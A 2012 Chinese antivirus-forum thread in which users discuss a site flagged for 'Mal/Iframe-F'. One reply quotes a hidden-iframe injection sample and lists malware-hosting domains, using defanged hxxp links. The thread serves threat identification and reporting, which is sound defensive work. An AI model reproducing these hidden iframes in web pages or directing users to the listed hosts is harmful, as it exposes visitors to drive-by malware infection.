http://swxnmzyj.org/listnews.asp[恶意]

显示全部楼层 · 发表于 2012-4-17 13:08:10

本帖最后由疯狂的小鬼于 2012-4-17 13:55 编辑

20120417 050201 在 "C:\Users\A\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D0IV3F7M\listnews[1].htm" 中检测到病毒/间谍软件'Mal/Iframe-F'。清除不可用。
20120417 050435 在 "C:\Users\A\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\O5JU9A86\listnews[1].htm" 中检测到病毒/间谍软件'Mal/Iframe-F'。清除不可用。

用IE进，sophos不报
用搜狗进，sophos就报
怎么回事？

显示全部楼层 · 发表于 2012-4-17 13:27:29

本帖最后由 said411f 于 2012-4-17 13:32 编辑

<iframe src=hxxp://127.0.0.1/m.htm width=0 height=0>

Description:

A hidden (and possibly malicious) iframe was identified. It is sometimes encoded with javascript to hide the fact that an iframe call is present. Loads malware from multiple sources:

fenkaololo.com
oooabterast0.co.cc
curem.net/t.php?id=455564
koska.sytes.net/phl/logs/index.php

Malware dump (sample of malware):
<iframe width=”1” height=`1` src=”hxxp://fenkaololo.com/mmmsss/xpxlkzbuaodwitdwy.php”..

显示全部楼层 · 发表于 2012-4-17 14:53:27

火狐直接拦截

显示全部楼层 · 发表于 2012-4-17 16:24:02

NIS2012封锁

http://siterating.norton.com/rep ... &source=toolbar

显示全部楼层 · 发表于 2012-4-17 20:46:08

晕，没拦截

显示全部楼层 · 发表于 2012-4-18 10:35:57

[已鉴定] http://swxnmzyj.org/listnews.asp[恶意]

评分